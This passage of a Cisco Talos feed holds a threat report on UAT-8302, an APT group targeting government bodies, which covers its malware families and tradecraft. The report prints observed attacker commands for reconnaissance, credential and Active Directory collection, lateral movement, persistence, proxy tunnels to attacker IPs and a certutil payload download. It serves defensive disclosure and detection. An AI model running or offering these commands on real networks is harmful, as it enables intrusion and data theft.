numbers used in&#xA0;scam&#xA0;emails impersonating multiple brands.</span></figcaption></figure><h2 id="conclusion-and-protection">Conclusion and&#xA0;protection&#xA0;</h2><p>When tracking&#xA0;scam&#xA0;campaigns, it is essential to look beyond individual sender email addresses, which are often ephemeral. Instead, it is more strategic to focus on phone numbers, which serve as the true anchors of the operation. By clustering&#xA0;scam&#xA0;lures based on shared phone numbers, security researchers can effectively map connections between&#xA0;seemingly unrelated&#xA0;campaigns,&#xA0;ultimately exposing&#xA0;the infrastructure of organized criminal call centers.&#xA0;</p><p>Service providers and security teams should prioritize the implementation of real-time reputation monitoring for different communication channels to proactively mitigate these threats. For example,&#xA0;establishing&#xA0;centralized databases that track and flag high-risk phone numbers across multiple platforms allows for rapid cross-campaign correlation. Collaboration between telecommunications and VoIP providers is also vital, as sharing threat intelligence&#xA0;regarding&#xA0;malicious telephony infrastructure enables an industry-wide defense against the persistent threat of social engineering and fraud.&#xA0;</p><h2 id="cisco-secure-email-threat-defense">Cisco Secure Email Threat Defense&#xA0;</h2><p>Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI-powered detections. Cisco Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats.</p><p>Secure Email Threat Defense&#xA0;identifies&#xA0;malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack.&#xA0;You can sign up for a&#xA0;<a href="https://www.cisco.com/c/en/us/products/security/email-threat-defense-free-trial.html" rel="noreferrer noopener"><u>free trial</u></a>&#xA0;of Email Threat Defense today.&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[UAT-8302 and its box full of malware]]></title><description><![CDATA[Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.]]></description><link>https://blog.talosintelligence.com/uat-8302/</link><guid isPermaLink="false">69f8b366594fe5000138101e</guid><category><![CDATA[APT]]></category><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><category><![CDATA[Cisco Talos Web Filtering]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><dc:creator><![CDATA[Jungsoo An]]></dc:creator><pubDate>Tue, 05 May 2026 10:00:30 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/UAT-8302.png" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.</li><li>After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.</li><li>Talos discovered a .NET-based backdoor we track as &#x201C;NetDraft&#x201D; that is a C#-based variant of the FinalDraft/SquidDoor malware family developed and operated by <a href="https://www.security.com/threat-intelligence/jewelbug-apt-russia">Jewelbug</a>/<a href="https://www.elastic.co/security-labs/fragile-web-ref7707">REF7707</a>/<a href="https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/">CL-STA-0049</a>/<a href="https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/">LongNosedGoblin</a>, a cluster of China-nexus APT actors.</li><li>Furthermore, UAT-8302 also uses an updated version of the <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer backdoor</a>, a malware family used in attacks against Russian government entities in 2024.</li><li>UAT-8302 also used VSHELL and its SNOWLIGHT stager in their operations, along with a new Rust-based stager that we track as SNOWRUST.</li></ul><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/UAT-8302.png" alt="UAT-8302 and its box full of malware"><p>Talos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group tasked primarily with obtaining and maintaining long-term access to government and related entities around the world.</p><p>Post-compromise activity consisted of information collection, credential extraction, and proliferation using open-source tooling such as Impacket, proxying tools, and custom-built malware.</p><p>Malware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a close operating relationship between them at the very least. Overall, the various malicious artifacts deployed by UAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have been assessed as China-nexus or Chinese-speaking by various third-party industry reports.</p><p>For instance, NetDraft, a .NET-based malware family deployed by UAT-8302 in South America, was also disclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as <a href="https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/">LongNosedGoblin. ESET assesses that LongNosedGoblin</a> used NosyDoor/NetDraft and other custom-made malware to target government organizations in Southeast Asia and Japan. Furthermore, as per <a href="https://rt-solar.ru/solar-4rays/blog/5603/">Solar&#x2019;s reporting</a>, NetDraft was also deployed against Russian IT organizations in 2024 by Erudite Mogwai (LuckyStrike Agent).</p><p>NetDraft is likely a .NET-ported variant of the FinalDraft/SquidDoor malware family developed and operated exclusively by <a href="https://www.security.com/threat-intelligence/jewelbug-apt-russia">Jewelbug</a>/<a href="https://www.elastic.co/security-labs/fragile-web-ref7707">REF7707</a>/<a href="https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/">CL-STA-0049</a> &#x2014; also another cluster of China-nexus APT actors.</p><p>Another malware family deployed by UAT-8302 is CloudSorcerer (version 3). <a href="https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/">Kaspersky</a> disclosed that <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer</a> was used in attacks directed against Russian government entities in 2024.</p><p>Furthermore, two other malware families, <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">SNAPPYBEE/DeedRAT</a> and <a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html">ZingDoor</a>, were deployed by UAT-8302 in conjunction with each other, a tactic also highlighted by <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">Trend Micro</a> in 2024.</p><p>Talos&#x2019; analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs:</p><ul><li>Draculoader: A generic shellcode loader deployed by UAT-8302, also used by the <a href="https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html">Earth Estries and Earth Naga</a> APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere.</li><li>SNOWLIGHT: A generic stager for the VSHELL malware family, used by UAT-8302. Also used by <a href="https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/">UAT-6382, who exploited a Cityworks zero-day</a> (CVE-2025-0994) to deploy VSHELL. SNOWLIGHT has also been seen in intrusions attributed to other China-nexus APT clusters, such as <a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect">UNC5174</a> and <a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182">UNC6586</a>.</li></ul><p>The various connections between UAT-8302 and other China-nexus or Chinese-speaking threat actors can be visualized as:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-05be427b-88d2-4272-8a70-c32cbabaebb5.jpeg" class="kg-image" alt="UAT-8302 and its box full of malware" loading="lazy" width="936" height="779" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-05be427b-88d2-4272-8a70-c32cbabaebb5.jpeg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-05be427b-88d2-4272-8a70-c32cbabaebb5.jpeg 936w" sizes="(min-width: 720px) 720px"></figure><p><em>Figure 1. UAT-8302&apos;s interconnections.</em></p><h2 id="initial-compromise-and-reconnaissance">Initial compromise and reconnaissance</h2><p>UAT-8302&apos;s tooling overlaps with various APT groups that have been known to exploit both zero-day and n-day exploits to obtain initial access. We assess that UAT-8302 follows the same paradigm of obtaining initial access to its victims.</p><p>Once initial access is obtained, UAT-8302 conducts preliminary reconnaissance using red-teaming tools such as Impacket:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/carbon-1-.png" class="kg-image" alt="UAT-8302 and its box full of malware" loading="lazy" width="1750" height="388" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/carbon-1-.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/carbon-1-.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/carbon-1-.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/carbon-1-.png 1750w" sizes="(min-width: 720px) 720px"></figure><p>Other reconnaissance commands may be:</p>
<!--kg-card-begin: html-->
<pre>
ipconfig /all
certutil -user -store My
certutil -user -store CA
certutil -user -store Root
whoami
nslookup www[.]google[.]com
net use
cmd.exe /c net view /domain
cmd.exe /c systeminfo
cmd.exe /c net time /domain
cmd.exe /c nslookup -type=SRV _ldap._tcp
net group &lt;name&gt; /domain
</pre>
<!--kg-card-end: html-->
<p>&#xA0;One of UAT-8302&apos;s primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. This extended recon is scripted usually using a custom-made PowerShell script such as &#x201C;whatpc.ps1&#x201D;:</p>
<!--kg-card-begin: html-->
<pre>
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Windows\Temp\whatpc.ps1
</pre>
<!--kg-card-end: html-->
<p>The script may be persisted to collect system information via a scheduled task:</p>
<!--kg-card-begin: html-->
<pre>
cmd.exe /c schtasks /create /tn &apos;ReconLiteDebug&apos; /tr &apos;powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\windows\temp\whatpc.ps1&apos; /sc ONCE /st 08:25 /ru SYSTEM /f

cmd.exe /c schtasks /create /tn &apos;RunWhatPC&apos; /tr &apos;c:\windows\temp\run.bat&apos; /sc ONCE /st 23:28 /ru SYSTEM /f
</pre>
<!--kg-card-end: html-->
<p>This script executes the following commands on the systems to identify them:</p>
<!--kg-card-begin: html-->
<pre>
whoami 
whoami.exe /groups
whoami.exe /priv
net.exe user
net.exe localgroup
net.exe localgroup administrators
ipconfig.exe /all
ARP.EXE -a
ROUTE.EXE print
NETSTAT.EXE -ano
cmd.exe /c net share
cmd.exe /c wmic startup get caption,command 2&gt;&amp;1
nltest.exe /dclist:&lt;domain&gt;
net.exe user /domain
net.exe group /domain
net.exe group Domain Admins /domain
nltest.exe /domain_trusts
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also performs ping sweeps of the network to discover more endpoints to proliferate into:</p>
<!--kg-card-begin: html-->
<pre>
C:/Windows/Temp/ping_scan.bat
C:/Windows/Temp/run_scan.bat
C:/Windows/Temp/nbtscan.exe

cmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= &amp;&amp; echo 192.168.1.%i is alive) &gt; C:\Windows\Temp\alive_hosts.txt
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also discovers SMB shares in the network to find reachable remote shares:</p>
<!--kg-card-begin: html-->
<pre>
cmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\192.168.1.%i\IPC$ &gt;nul 2&gt;&amp;1 &amp;&amp; echo 192.168.1.%i - Port 445 is open || echo 192.168.1.%i - Port 445 is closed) &gt; C:\Windows\Temp\portscan.txt
</pre>
<!--kg-card-end: html-->
<h3 id="scanning-tools">Scanning tools</h3><p>UAT-8302 may also download and run &#x201C;<a href="https://github.com/chainreactors/gogo">gogo</a>,&#x201D; a GoLang based, open-sourced automated network scanning engine written in Simplified Chinese:</p>
<!--kg-card-begin: html-->
<pre>
curl -fsSL hxxps://github[.]com/chainreactors/gogo/releases/download/v2.14.0/gogo_windows_amd64.exe -o go.exe
</pre>
<!--kg-card-end: html-->
<p>Additionally, UAT-8302 uses a variety of scanning tools such as <a href="https://github.com/qi4L/qscan">QScan</a>, <a href="https://github.com/projectdiscovery/naabu">naabu</a> and <a href="https://github.com/SleepingBag945/dddd">dddd</a> &#xA0;PortQry and <a href="https://docs.projectdiscovery.io/opensource/httpx/overview">httpx</a> to discover services in the network:</p>
<!--kg-card-begin: html-->
<pre>
httpx.exe -sc -title -location -f -td -r 192.168.1.1/16
httpx.exe -sc -title -location -td -r 192.168.1.1/16 -o web.txt
httpx.exe -sc -title -location -td -u 192.168.1.1/16 -o web.txt
</pre>
<!--kg-card-end: html-->
<h2 id="information-collection">Information collection</h2><p>UAT-8302 collects a variety of information about the environment that they are operating within including Active Directory (AD) information and credentials using open-sourced tooling such as:</p><h3 id="adconnectdumppy">adconnectdump.py</h3><p>A Python-based tool for Azure AD Connect/Entra ID connect credential extraction:</p>
<!--kg-card-begin: html-->
<pre>
python.exe adconnectdump.py
</pre>
<!--kg-card-end: html-->
<h3 id="manual-extraction">Manual extraction</h3><p>UAT-8302 may also directly query the AD user and computer objects to obtain information from them via PowerShell:</p>
<!--kg-card-begin: html-->
<pre>
powershell -command Get-ADUser -Filter * -Property * | Select-Object Name, Displayname, LastLogonDate, PasswordLastSet, PasswordExpired, Description, EmailAddress, homeDirectory, scriptPath

powershell -command Get-ADUser -Filter * -Property * | Select-Object SamAccountName, DisplayName, Enabled, LastLogonDate, PasswordLastSet, PasswordExpired, Description, EmailAddress, HomeDirectory, ScriptPath, @{Name=&apos;Groups&apos;;Expression={((Get-ADUser $.SamAccountName -Properties MemberOf).MemberOf | ForEach-Object { ($ -split &apos;,&apos;)[0] -replace &apos;^CN=&apos; }) -join &apos;; &apos;}}

powershell -Command Get-ADComputer -Filter * -Property Name,DNSHostName,OperatingSystem,Description | Select-Object Name, DNSHostName, OperatingSystem, Description | Format-Table -AutoSize
powershell -Command Get-ADGroup -Filter * -Properties Members, Description | Select-Object Name, Description, @{Name=&apos;Members&apos;;Expression={ ($.Members | ForEach-Object { ($ -split &apos;,&apos;)[0] -replace &apos;^CN=&apos; }) -join &apos;; &apos; }}| Format-Table -AutoSize
</pre>
<!--kg-card-end: html-->
<p>Specific AD users of interest may also be queried using system tools such as dsmod and dsquery.</p><h3 id="log-collection">Log collection</h3><p>UAT-8302 also collects event log information and the logs themselves on multiple endpoints. Logs are an excellent source of obtaining information and understanding security configurations and policies applied within a target&#x2019;s environment:</p>
<!--kg-card-begin: html-->
<pre>
powershell -Command Get-WinEvent -ListLog Security | Format-List LogName, FileSize, LogMode, MaximumSizeInBytes, RecordCount

powershell -command Get-EventLog -LogName System -Source NETLOGON -Newest 5000 | Where-Object { $_.Message -match &quot;Administrator&quot; }

powershell -Command chcp 437 &gt;$null; Get-WinEvent -FilterHashtable @{ LogName = &apos;Security&apos;; ID = 4768 } | Where-Object { \$_.Message -match &apos;Administrador&apos; }
</pre>
<!--kg-card-end: html-->
<p>Audit policies are also queried extensively to obtain system logging configurations:</p>
<!--kg-card-begin: html-->
<pre>
auditpol /get /category:Logon/Logoff

auditpol /get /category:*
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also collects AD snapshots using tools such as the AD Explorer tool:</p>
<!--kg-card-begin: html-->
<pre>
ae.exe -snapshot c:\windows\temp\result.dat /accepteula

cmd.exe /C 7zr.exe a -mx=5 c:\windows\temp\r.7z c:\windows\temp\result.dat
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also uses a tool written in Simplified Chinese called &#x201C;<a href="https://github.com/mabangde/SharpGetUserLoginIPRPC">SharpGetUserLoginIPRP</a>&#x201D; &#x2014; derived from another <a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E8%8E%B7%E5%BE%97%E5%9F%9F%E7%94%A8%E6%88%B7%E7%9A%84%E7%99%BB%E5%BD%95%E4%BF%A1%E6%81%AF">Chinese-language repository</a> &#x2014; which is used to extract login information from a domain controller:</p>
<!--kg-card-begin: html-->
<pre>
C:\ProgramData\S.exe user:pass@IP -day
</pre>
<!--kg-card-end: html-->
<h2 id="proliferation-through-the-network">Proliferation through the network</h2><p>UAT-8302 proliferates across various endpoints by using a combination of either Impacket- or WMI-based remote process creation:</p>
<!--kg-card-begin: html-->
<pre>
cmd.exe /C wmic /node:IP process call create cmd.exe /c c:\programdata\e1.bat

cmd.exe /C schtasks /S IP /U username /P passwd /create /tn &apos;Runbat&apos; /tr &apos;c:\windows\temp\run.bat&apos; /sc ONCE /st 5:12 /ru SYSTEM /f
</pre>
<!--kg-card-end: html-->
<p>These BAT files are meant to execute the accompanying malware on the target systems.</p><p>Furthermore, UAT-8302 may also extract login credentials from MobaxXterm, a multi-functional and tabbed SSH client, using tools such as <a href="https://github.com/h0ny/MobaXtermDecryptor/">MobaXtermDecryptor</a> to pivot to other endpoints.</p><h2 id="custom-made-malware-deployment">Custom-made malware deployment</h2><p>UAT-8302 deploys a variety of malware families in their intrusions including NetDraft, CloudSorcerer version 3, and VSHELL.</p><h3 id="netdraft">NetDraft</h3><p>NetDraft, also known as&#xA0; <a href="https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/">NosyDoor</a>, is a .NET variant of the FINALDRAFT malware. FINALDRAFT or Squidoor is a malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049, a cluster of China-nexus APT actors. FINALDRAFT uses legitimate services such as MS Graph to act as command-and-control servers (C2s) to execute commands and payloads on the compromised system. Similarly, NetDraft relies on the MS Graph API to communicate with its OneDrive based C2. NetDraft is deployed using the following mechanism:</p><ul><li>A benign executable is used to side load a malicious dynamic-link library (DLL) based loader.</li><li>The loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the existing process.</li><li>NetDraft also contains an embedded, .NET-based helper library. The library is compressed and embedded using the Fody/Costura framework. During runtime, the library is decompressed and instrumented to carry out operations on the endpoint on behalf of NetDraft. We track this library as &#x201C;FringePorch.&#x201D;</li></ul><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-58ab9702-fb7d-48a4-92b4-db63c5a430b3.jpeg" class="kg-image" alt="UAT-8302 and its box full of malware" loading="lazy" width="936" height="840" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-58ab9702-fb7d-48a4-92b4-db63c5a430b3.jpeg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-58ab9702-fb7d-48a4-92b4-db63c5a430b3.jpeg 936w" sizes="(min-width: 720px) 720px"></figure><p><em>Figure 2. NetDraft and FringePorch infection chain.</em></p><p>NetDraft and FringePorch support the following functionalities:</p><ul><li>Execute arbitrary commands on the endpoint</li><li>Execute a .NET based assembly sent by the C2 within NetDraft&#x2019;s process context</li><li>Exit and stop execution</li><li>Upload files to C2</li><li>Download files from specified remote locations to local disks</li><li>File management: Change current working directory, rename files, enumerate files, and set write times</li><li>Sleep</li><li>Execute a .NET plugin: This functionality is similar to its ability to run arbitrary .NET based assemblies. Here, the implant runs a provided plugin&#x2019;s &#x201C;Plugin.Run&#x201D; function.</li></ul><p>Since NetDraft is missing the capability to persist across reboots and relogins, one of the first commands the C2 issues to it is the creation of a malicious scheduled task:</p>
<!--kg-card-begin: html-->
<pre>
schtasks /create /ru system /tn Microsoft\Windows\Maps\{a086ff1e-d6dc-45f7-b3e4-6udknw82sa} /sc hourly /mo 2 /tr &apos;C:\ProgramData\Microsoft\Microsoft\Appunion.exe&apos; /F
</pre>
<!--kg-card-end: html-->
<h2 id="cloudsorcerer-v3">CloudSorcerer v3</h2><p>Another malware UAT-8302 deploys is the latest version of the <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer backdoor</a> (version 3). &#xA0;The malware consists of the side-loading triad of files: a benign executable, a malicious DLL-based loader, and the actual implant in a data file:</p>
<!--kg-card-begin: html-->
<pre>
Yandex.exe -r -p:test.ini -s:12

VMtools.exe -r -p:VM.ini -s:12
</pre>
<!--kg-card-end: html-->
<p>The executables will sideload a DLL named &#x201C;mspdb60[.]dll&#x201D;, which will load and decrypt the &#x201C;.ini&#x201D; file specified in the command line &#x2014; such as &#x201C;test.ini&#x201D; or &#x201C;vm.ini&#x201D;. The decrypted shellcode is then injected into a combination of specified benign processes.</p><h3 id="cloudsorcerer-v3-%E2%80%93-the-decrypted-shellcode">CloudSorcerer v3 &#x2013; The decrypted shellcode</h3><p>The decrypted INI file is a newer version of <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer</a> (v3) disclosed by Kaspersky in 2024. Depending on process name (where it may have been initiated or injected), CloudSorcerer v3 will perform one of the following actions:</p><ul><li>If the process is named &#x201C;dpapimig.exe&#x201D;, then it will gather system information, inject itself into explorer.exe, and receive command codes from the C2 via a named pipe, gather disk information, enumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.) and execute shellcode received via the named pipe.</li><li>If the process is named &#x201C;spoolsv.exe&#x201D;, then it will contact GitHub to obtain C2 information and receive commands from the C2.</li><li>If the process is named &#x201C;mspaint.exe&#x201D;, &#x201C;browser&#x201D;, or anything else, it will proceed to inject itself into dpapimg.exe, spoolsv.exe, etc. to kick off its malicious operations.</li></ul><p>The system information CloudSorcerer v3 collects includes computer name, username and local system time.</p><h4 id="obtaining-c2-information">Obtaining C2 information</h4><p>Like <a href="https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/">CloudSorcerer v2</a>, version 3 contacts a legitimate service to obtain the C2 information. The malware will either contact a specific GitHub repository to read a data blob, or read a GameSpot profile the threat actors set up.</p><p>The data blob is decoded to obtain the C2 information, which can exist in the one of the following formats depending on the variant of the CloudSorcerer backdoor:</p><ul><li>A C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication with the C2 to carry out malicious operations</li><li>An access token to a legitimate service (such as OneDrive or Dropbox) that UAT-8302 uses to act as its C2 infrastructure to obtain next-stage payloads and commands</li></ul><h2 id="vshell-snowlight-and-snowrust">VSHELL, SNOWLIGHT and SNOWRUST</h2><p>In other instances, UAT-8302 deploys the VSHELL malware via a slightly different triad of artifacts for side-loading malware. The benign executable side-loads a malicious DLL named &#x201C;wininet[.]dll&#x201D; that reads a BIN file and injects it into &#x201C;explorer[.]exe&#x201D;.</p><p>The payload is position-independent shellcode that is injected into explorer[.]exe. The payload is a stager for the VSHELL malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded payload is a garbled version of VSHELL.</p><p>It is worth noting that Talos observed the same <a href="https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/">single byte key and stager being used by UAT-6382</a> to deliver VSHELL malware in early 2025. Further investigation revealed that this stager is in fact <a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect">SNOWLIGHT</a>, a lightweight downloader that can download and deploy a next stage payload. UNC5174 has been observed using SNOWLIGHT to download <a href="https://www.sysdig.com/blog/unc5174-chinese-threat-actor-vshell">Sliver</a> and <a href="https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures">VSHELL</a>. UNC5174 is a suspected China-nexus threat actor that typically exploits <a href="https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures">zero-day</a> and <a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect">n-day</a> vulnerabilities to gain access to critical infrastructure organizations in the Americas.</p><p>Talos discovered that UAT-8302 also used a Rust based variant of SNOWLIGHT that we track as &#x201C;SNOWRUST.&#x201D; SNOWRUST is based on the <a href="https://github.com/tehstoni/LexiCrypt">LexiCrypt</a> Rust-based shellcode obfuscator. SNOWRUST simply decodes the embedded SNOWLIGHT shellcode and executes it to download the XOR encoded final payload, VSHELL, received from the C2.</p><p>In one intrusion, UAT-8302 used VSHELL to deploy a native driver from the <a href="https://github.com/theSecHunter/Hades-Windows/">Hades HIDS/HIPS</a> software &#x2014; an open-source Windows host monitoring kernel framework written in Simplified Chinese. The driver was specifically the System Monitoring filter driver that lets Hades register callbacks for process, thread, registry, and file events. This allows the driver to monitor the system and potentially allow, block, or hide events and artifacts.</p><h2 id="the-snappybeedeedrat-and-zingdoor-combo">The SNAPPYBEE/DeedRAT and ZingDoor combo</h2><p>In one instance, UAT-8302 first deployed a RAT family known as <a href="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/">DeedRAT</a>/<a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">SNAPPYBEE</a>. However, UAT-8302 almost immediately switched over to a DLL-based malware family known as <a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html">ZingDoor</a>, first disclosed by Trend Micro in 2023, which <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">has attributed both</a> DeedRAT and ZingDoor to the <a href="https://www.trendmicro.com/en_us/research/24/k/earth-estries.html">China-nexus threat actor</a> <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/earth_estries">Earth Estries</a>.</p><p>ZingDoor has also been deployed after the <a href="https://www.security.com/threat-intelligence/toolshell-china-zingdoor">successful exploitation of ToolShell in 2025</a> by China-nexus threat actors.</p><p>In parallel, UAT-8302 also deployed Draculoader, a generic shellcode loader, also used by the <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">Earth Estries</a> and <a href="https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html">Earth Naga</a> APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere:</p>
<!--kg-card-begin: html-->
<pre>
C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\d3d8.dll
</pre>
<!--kg-card-end: html-->
<h2 id="setting-up-additional-means-of-backdoor-access">Setting up additional means of backdoor access</h2><p>Once UAT-8302 deploys their custom-made malware, they begin establishing other means of backdoor access. One of the techniques used is setting up proxy servers on infected systems to tunnel traffic outside the enterprise to the infected hosts using tools such as <a href="https://github.com/ph4ntonn/Stowaway">Stowaway</a> (another tool written in Simplified Chinese):</p>
<!--kg-card-begin: html-->
<pre>
c:\windows\system32\wagent.exe -c 85[.]209[.]156[.]3:56456
  
cmd.exe /c (echo @echo off &amp;&amp; start c:\windows\temp\mmc.exe -l 85[.]209[.]156[.]3:56456 -s &lt;pass&gt; &amp;&amp; echo exit) &gt; c:\windows\temp\trun.bat
  
ag531.exe -c 45[.]135[.]135[.]100:443 -s &lt;blah&gt; -f AgreedUponByAllParties
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 may use other tools such as <a href="https://github.com/wzshiming/anyproxy">anyproxy</a> to set up proxies within the infected enterprise&#x2019;s network:</p>
<!--kg-card-begin: html-->
<pre>
c:\users\public\any.exe
</pre>
<!--kg-card-end: html-->
<p>Furthermore, we observed UAT-8302 deploying the SoftEther VPN clients as well:</p>
<!--kg-card-begin: html-->
<pre>
certutil -urlcache -split -f hxxp://38[.]54[.]32[.]244/Rar.exe rar.exe
  
rar.exe x glb.rar
  
Communicator.exe /usermode
</pre>
<!--kg-card-end: html-->
<h2 id="coverage">Coverage</h2><p>The following ClamAV signatures detect and block this threat:</p><ul><li>Win.Loader.CloudSorcerer-10059633-0</li><li>Win.Loader.CloudSorcerer-10059634-0</li><li>Win.Malware.CloudSorcerer-10059635-0</li><li>Win.Tool.dddd-10059636-2</li><li>Win.Tool.dddd-10059637-0</li><li>Win.Loader.Donut-10059638-0</li><li>Win.Loader.Draculoader-10059639-0</li><li>Win.Tool.gogo-10059640-0</li><li>Win.Tool.gogo-10059641-0</li><li>Ps1.Tool.Microburst-10059642-0</li><li>Win.Tool.Mobaxtermdecryptor-10059643-0</li><li>Win.Malware.Netdraft-10059644-0</li><li>Win.Malware.Netdraft-10059645-0</li><li>Win.Malware.Netdraft-10059646-0</li><li>Win.Malware.Netdraft-10059647-0</li><li>Win.Malware.Snappybee-10059648-0</li><li>Win.Malware.Snappybee-10059649-0</li><li>Win.Malware.Snappybee-10059650-0</li><li>Win.Malware.Snappybee-10059651-0</li><li>Win.Malware.Snappybee-10059652-0</li><li>Win.Malware.Snappybee-10059653-0</li><li>Win.Malware.Snowrust-10059654-0</li><li>Win.Malware.Agent-10059655-0</li><li>Win.Malware.Stowaway-10059656-0</li><li>Win.Malware.Stowaway-10059657-0</li><li>Win.Loader.Agent-10059658-0</li><li>Win.Malware.Agent-10059659-0</li><li>Win.Malware.Agent-10059660-0</li><li>Win.Loader.Agent-10059661-1</li><li>Win.Malware.Agent-10059662-0</li></ul><p>The following Snort Rules (SIDs) detect and block this threat:</p><ul><li>66055, 66054, 301437, 301436, 301435, 301434, 301433, 301432, 301431</li><li>66052, 66053, 66050, 66051, 66048, 66049, 66046, 66047, 66044, 66045, 